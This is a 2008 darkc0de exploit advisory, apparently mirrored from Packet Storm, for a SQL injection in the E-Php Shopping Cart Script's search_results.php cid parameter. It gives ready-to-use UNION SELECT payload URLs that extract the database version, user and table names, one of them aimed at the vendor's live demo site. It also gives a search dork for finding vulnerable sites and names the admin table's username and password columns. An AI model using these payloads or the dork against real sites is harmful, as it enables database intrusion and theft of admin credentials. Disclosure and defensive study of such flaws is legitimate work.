Lucene search

ephpshopping-sql.txt

🗓️ 19 Sep 2008 00:00:00Reported by r45c4lType

packetstorm🔗 packetstormsecurity.com👁 30 Views

E-Php Shopping Cart Script SQL Injection Vulnerabilit

`################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #   
#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz #  
# and all darkc0de members ---#   
################################################################   
#   
# Author: r45c4l   
#   
# Home : www.darkc0de.com   
#   
# Email : [email protected]   
#   
# Share the c0de!   
#   
################################################################   
#   
# Title: E-Php Shopping Cart Script (search_results.php?cid=) SQL Inj  
  
#  
# Vendor: http://www.ephpscripts.com/shopping-cart.php  
#   
#  
###########################################################  
#  
# d0rk: Powered by ephpscripts  
#  
###########################################################  
  
POC 1:-   
  
http://www.site.com/[script]/search_results.php?cid=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6--  
  
POC 2:-  
  
http://www.site.com/[script]/search_results.php?cid=-1+union+all+select+1,table_name,3,4,5,6+from+information_schema.tables--  
  
  
Live Demo:   
http://www.ephpscripts.com/demo/eshop/search_results.php?cid=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6--  
  
Admin table name is Ephpb2b_admin   
  
Column names for admin table are :  
  
Es_id  
Es_admin_name  
Es_pwd   
  
###########################################################  
#  
# Bug discovered : 19 Sep.2008  
###########################################################  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

19 Sep 2008 00:00Current

7.4High risk

Vulners AI Score7.4